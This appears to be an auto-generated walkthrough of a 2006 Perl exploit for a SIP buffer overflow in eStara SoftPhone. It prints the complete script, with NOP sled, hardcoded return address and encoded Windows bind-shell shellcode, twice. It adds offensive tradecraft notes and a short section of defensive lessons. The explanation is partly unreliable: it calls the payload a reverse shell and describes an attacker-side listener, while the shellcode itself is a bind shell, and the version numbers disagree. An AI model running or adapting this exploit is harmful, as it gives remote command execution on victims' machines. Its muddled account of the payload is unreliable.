By exploitdb papers bot•January 12, 2006•

papers

Explaining the eStara SoftPhone 3.0.1.46 SIP Remote Buffer Overflow Exploit

What this paper is

This paper details a remote buffer overflow vulnerability in eStara SoftPhone version 3.0.1.46. The exploit, written in Perl, targets a flaw in how the softphone handles SIP (Session Initiation Protocol) messages. By sending a specially crafted SIP INVITE request, an attacker can overwrite the program's memory, leading to the execution of arbitrary code. The exploit aims to establish a reverse shell connection back to the attacker.

Simple technical breakdown

The eStara SoftPhone, when processing incoming SIP messages, has a buffer that is not large enough to hold certain data. The exploit sends an oversized SIP INVITE message. This oversized message fills the buffer and then spills over into adjacent memory locations. Crucially, this overflow overwrites a return address on the program's call stack. When the function that processed the SIP message tries to return, it will instead jump to an address controlled by the attacker, which points to malicious code (shellcode) embedded within the oversized message itself.

The exploit uses UDP to send the crafted SIP INVITE. The attacker hopes that users will forward both TCP and UDP port 5060 for SIP to work, making the UDP exploit more likely to reach the target.

Complete code and payload walkthrough

The provided Perl script damn-hippie.pl by kokanin is designed to exploit the eStara SoftPhone.

#!/usr/bin/perl -s
# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info = 3.0.1.2
# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
# Lets face it, most users wont know the difference between tcp and udp even if
# if it bites them in the ass, so the port is chosen in the hope that nat'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.

# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.

# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ]
# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
# how to write win32 shellcode even if someone bit me in the ass :)
# since the shellcode exits the thread the user should not notice anything.

use IO::Socket; # Imports the necessary module for network socket operations.
if(!$ARGV[0]) # Checks if the first command-line argument is provided.
{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); } # If no argument, prints a message and exits. The argument is expected to be the target IP address.
my $ret = pack("l",0x0303DCDF); # Sets the return address. This is a hardcoded memory address within softphone.exe that the exploit wants to jump to. 'pack("l", ...)' converts the hexadecimal address into a little-endian binary representation suitable for memory.
my $buflen = 4099; # Defines the total buffer size for the exploit payload.

my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82"; # This is the actual shellcode. It's a sequence of bytes that, when executed, will perform a specific action on the target system. In this case, it's a win32_bind shellcode that listens on a port and provides a command shell. The comment indicates it's encoded and designed to exit the thread, minimizing user detection.

my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode; # Creates the main buffer. It's filled with NOP (No Operation) instructions (`\x90`) until the size reaches `$buflen`, and then the `$shellcode` is appended. The NOPs act as a "sled" to ensure the execution reliably lands on the shellcode, even if the exact overflow point varies slightly.

my $sipinvite = # Constructs the SIP INVITE message.
"INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n". # The INVITE request line. The recipient address is arbitrary.
"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n". # The Via header indicates the path the request took.
"From: 2448 <sip:kagemand\@abcdabcd.fi.st>;tag=2448\r\n". # The From header.
"To: Receiver <sip:snotboble\@solgryn.fi.st>\r\n". # The To header.
"Call-ID: 0\@abcdabcd.fi.st\r\n". # A unique identifier for the call.
"CSeq: 1 INVITE\r\n". # The CSeq header specifies the sequence number and method.
"Contact: 2448 <sip:kagemand\@abcdabcd.fi.st>\r\n". # Contact information for the sender.
"Expires: 1200\r\n". # How long the invitation is valid.
"Max-Forwards: 70\r\n". # Limits the number of hops the request can take.
"Content-Type: application/sdp\r\n". # Indicates the content of the message body is SDP (Session Description Protocol).
"Content-Length: 4234\r\n". # This is a crucial part of the overflow. The actual length of the SDP body is much larger than what the application might expect, leading to the buffer overflow. The value 4234 is likely chosen to contribute to the overflow.
"\r\n". # End of headers.
$buffer . # The crafted buffer containing NOPs and shellcode. This is where the overflow happens.
"=0\r\n". # Part of the SDP body.
"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n". # The origin line of the SDP. This is where the attacker's controlled return address (`$ret`) is placed. The "DCBA.fi.st" part is padding to ensure the `$ret` address is correctly positioned within the overflowed data.
"s=Session SDP\r\n". # Session name.
"c=IN IP4 123.123.12.34\r\n". # Connection information.
"t=0 0\r\n". # Time description.
"m=audio 9876 RTP/AVP 0\r\n". # Media description (audio).
"a=rtpmap:0 PCMU/8000\r\n". # RTP mapping.
"\r\n"; # End of SDP body.

$host = $ARGV[0]; # Assigns the target IP address from the command-line argument to the $host variable.
$port = 5060; # Sets the target port to 5060, a common port for SIP.

$socket = new IO::Socket::INET # Creates a new UDP socket.
(
Proto    => "udp", # Specifies UDP protocol.
PeerAddr => $host, # Sets the remote host IP address.
PeerPort => $port, # Sets the remote host port.
);

die "unable to connect to $host:$port ($!)\n" unless $socket; # Checks if the socket creation was successful.

print $socket $sipinvite; # Sends the crafted SIP INVITE message over the UDP socket.

close($socket); # Closes the socket connection.

# milw0rm.com [2006-01-12]

Mapping of code fragments to practical purpose:

#!/usr/bin/perl -s: Shebang line indicating the script is a Perl script and enables command-line switches (like -s for script arguments).
use IO::Socket;: Imports the Perl module for creating and managing network sockets.
if(!$ARGV[0]) { ... }: Command-line argument validation. Ensures the target IP address is provided.
my $ret = pack("l",0x0303DCDF);: Defines the target return address. This is the memory location where the program should jump after the vulnerable function returns. 0x0303DCDF is a specific address within softphone.exe.
my $buflen = 4099;: Defines the total size of the buffer that will be sent. This includes padding and the shellcode.
my $shellcode = "...": The actual machine code (shellcode) that will be executed on the victim machine. This specific shellcode is a "bind shell" that opens a listening port and provides a command prompt.
my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;: Constructs the payload buffer. It's filled with NOP sled (\x90) characters to ensure reliable execution of the shellcode, followed by the shellcode itself.
my $sipinvite = "...": Constructs the full SIP INVITE message. This message is designed to be malformed and oversized, triggering the buffer overflow.
- Content-Length: 4234\r\n: This header value is likely exaggerated or used in conjunction with the oversized body to cause the overflow.
- $buffer . "=0\r\n": The crafted buffer is inserted into the SDP body.
- o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n": This line is critical. The attacker's return address ($ret) is embedded here, within the SDP's origin line. When the overflow occurs, this address will overwrite the legitimate return address on the stack.
$host = $ARGV[0];: Retrieves the target IP address from the command line.
$port = 5060;: Sets the target port to 5060.
$socket = new IO::Socket::INET(...): Initializes a UDP socket to communicate with the target.
die "unable to connect to $host:$port ($!)\n" unless $socket;: Error handling for socket creation.
print $socket $sipinvite;: Sends the crafted SIP INVITE message to the target.
close($socket);: Closes the network connection.

Shellcode/Payload Breakdown:

The shellcode is a sequence of bytes representing machine instructions. Based on the comments, it's a "win32_bind" shellcode. This type of shellcode typically performs the following actions:

Initialization: Sets up registers and prepares for execution.
Socket Creation: Creates a new socket.
Binding: Binds the socket to a specific port (in this case, likely 5060, as indicated by LPORT=5060).
Listening: Puts the socket into a listening state for incoming connections.
Accepting: Accepts an incoming connection from the attacker.
Duplicating Handles: Duplicates the socket handle to standard input, output, and error streams. This allows the attacker to send commands and receive output through the established connection.
Executing a Shell: Spawns a command shell (like cmd.exe) and redirects its input/output to the network socket.
Exiting Thread: The comment EXITFUNC=thread suggests that after spawning the shell, the shellcode will exit the current thread, rather than the entire process. This is a common technique to make the exploit less noticeable to the user.

The exact sequence of bytes in the shellcode is complex and specific to the x86 architecture. Without a disassembler, a byte-by-byte analysis is impractical and less informative than understanding its overall function as a bind shell.

Practical details for offensive operations teams

Required Access Level: Network access to the target IP address and port 5060 (UDP). No prior local access is required.
Lab Preconditions:
- A vulnerable eStara SoftPhone 3.0.1.46 instance running on a Windows machine.
- A separate attacker machine with Perl installed and the exploit script.
- Network connectivity between the attacker and the target.
- Understanding of SIP and network protocols.
Tooling Assumptions:
- Perl interpreter for running the exploit script.
- A network listener (e.g., netcat or msfconsole) on the attacker machine to receive the incoming shell connection.
- A way to determine the target's IP address.
Execution Pitfalls:
- Firewalls/Network Segmentation: UDP traffic on port 5060 might be blocked by firewalls.
- NAT: Network Address Translation can complicate direct UDP connections. The exploit authors' assumption about NAT forwarding is a key consideration.
- Software Version: The exploit is specific to version 3.0.1.46. Any other version will likely not be vulnerable.
- Return Address Stability: The hardcoded return address (0x0303DCDF) is specific to the compiled softphone.exe and its loaded modules. ASLR (Address Space Layout Randomization) or different patch levels could render this address invalid. In 2006, ASLR was not as prevalent on Windows as it is today.
- Shellcode Size and Buffer Overflow: The shellcode must fit within the overflowed buffer, and the overflow must be precisely controlled to overwrite the return address correctly. The NOP sled helps with this.
- UDP Reliability: UDP is an unreliable protocol. Packets can be lost or arrive out of order, which could cause the exploit to fail.
Tradecraft Considerations:
- Reconnaissance: Confirming the exact version of eStara SoftPhone is critical. Network scanning and banner grabbing might reveal this.
- Stealth: UDP traffic can sometimes be less scrutinized than TCP, but the nature of the payload (attempting to establish a shell) is inherently noisy.
- Payload Delivery: The exploit sends the payload as part of a SIP INVITE. This is a common technique for application-layer exploits.
- Post-Exploitation: Once a shell is established, the attacker has command-line access. Standard post-exploitation techniques would then apply.
Telemetry:
- Network Traffic: Unusual UDP traffic on port 5060 originating from the attacker and targeting the victim. The packet content will be a malformed SIP INVITE.
- Application Logs: The eStara SoftPhone might log errors related to malformed SIP messages or crashes.
- System Logs: If the exploit is successful, the target system might show signs of a new process (the shell) or unexpected network connections on the port the shellcode is listening on.
- Process Monitoring: The softphone.exe process might crash or exhibit abnormal behavior. A new cmd.exe process might be spawned if the shellcode executes successfully.

Where this was used and when

This exploit was published on January 12, 2006. At that time, eStara SoftPhone was likely in active use. Exploits from this era were often used in penetration testing engagements, by security researchers to demonstrate vulnerabilities, and unfortunately, by malicious actors for unauthorized access. The specific context of its discovery and release suggests it was a novel vulnerability (0-day) at the time of kokanin's research.

Defensive lessons for modern teams

Software Patching and Updates: The most fundamental defense is to keep software, especially network-facing applications like VoIP clients, patched and up-to-date. This vulnerability was specific to an older version.
Intrusion Detection/Prevention Systems (IDS/IPS): Network IDS/IPS solutions can be configured to detect malformed SIP packets or known exploit patterns. Signature-based detection for this specific exploit might be available.
Network Segmentation and Firewalls: Restricting UDP traffic on port 5060 to only trusted SIP servers or internal clients can limit the attack surface.
Application-Level Security: Modern applications often have built-in protections against buffer overflows, such as stack canaries or DEP (Data Execution Prevention). However, these can sometimes be bypassed.
Endpoint Detection and Response (EDR): EDR solutions can detect anomalous process behavior, such as a softphone application crashing and spawning a command shell, or unexpected network connections.
Protocol Validation: SIP servers and clients should rigorously validate incoming messages according to RFC standards to reject malformed or oversized packets early.
Secure Coding Practices: Developers must be aware of common vulnerabilities like buffer overflows and implement secure coding practices, including bounds checking for all buffer operations.

ASCII visual (if applicable)

This exploit involves a network-based attack where a crafted packet overwrites memory. A visual representation of the network interaction and memory corruption can be helpful.

+-----------------+       +-----------------------+
| Attacker Machine| ----> | Target eStara SoftPhone|
| (Perl Script)   |       | (Vulnerable Process)  |
+-----------------+       +-----------------------+
        |                         |
        | UDP Packet (SIP INVITE) |
        | (Oversized, Malicious)  |
        |------------------------>|
                                  |
                                  | Processes SIP INVITE
                                  | Hits Buffer Overflow
                                  | Overwrites Return Address
                                  | Jumps to Shellcode
                                  |
                                  | Executes Shellcode
                                  | (e.g., opens reverse shell)
                                  |
                                  | <-----------------------+
                                  |                         |
                                  |                         | UDP/TCP Connection
                                  |                         | (Shell)
                                  |                         |
                                  +-------------------------+
                                    (Back to Attacker)

Explanation:

The attacker's machine sends a specially crafted UDP packet containing a SIP INVITE request.
This packet is designed to be larger than expected by the eStara SoftPhone application.
When the softphone processes this packet, the excess data overflows a buffer.
This overflow corrupts critical data on the program's call stack, specifically overwriting the return address.
Instead of returning to its normal execution path, the program jumps to the attacker-controlled shellcode.
The shellcode executes, typically establishing a command shell back to the attacker.

Source references

PAPER ID: 1414
PAPER TITLE: eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)
AUTHOR: kokanin
PUBLISHED: 2006-01-12
KEYWORDS: Windows, remote
PAPER URL: https://www.exploit-db.com/papers/1414
RAW URL: https://www.exploit-db.com/raw/1414

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl -s
# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info = 3.0.1.2
# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
# Lets face it, most users wont know the difference between tcp and udp even if 
# if it bites them in the ass, so the port is chosen in the hope that nat'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.

# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.

# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
# how to write win32 shellcode even if someone bit me in the ass :)
# since the shellcode exits the thread the user should not notice anything.

use IO::Socket;
if(!$ARGV[0])
{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
my $buflen = 4099;

my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82";

my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;

my $sipinvite = 

"INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n".
"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n".
"From: 2448 <sip:kagemand\@abcdabcd.fi.st>;tag=2448\r\n".
"To: Receiver <sip:snotboble\@solgryn.fi.st>\r\n".
"Call-ID: 0\@abcdabcd.fi.st\r\n".
"CSeq: 1 INVITE\r\n".
"Contact: 2448 <sip:kagemand\@abcdabcd.fi.st>\r\n".
"Expires: 1200\r\n".
"Max-Forwards: 70\r\n".
"Content-Type: application/sdp\r\n".
"Content-Length: 4234\r\n".
"\r\n".
$buffer . 
"=0\r\n".
"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n".
"s=Session SDP\r\n".
"c=IN IP4 123.123.12.34\r\n".
"t=0 0\r\n".
"m=audio 9876 RTP/AVP 0\r\n".
"a=rtpmap:0 PCMU/8000\r\n".
"\r\n";
$host = $ARGV[0];
$port = 5060;

$socket = new IO::Socket::INET
(
Proto    => "udp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket $sipinvite; 

close($socket);

# milw0rm.com [2006-01-12]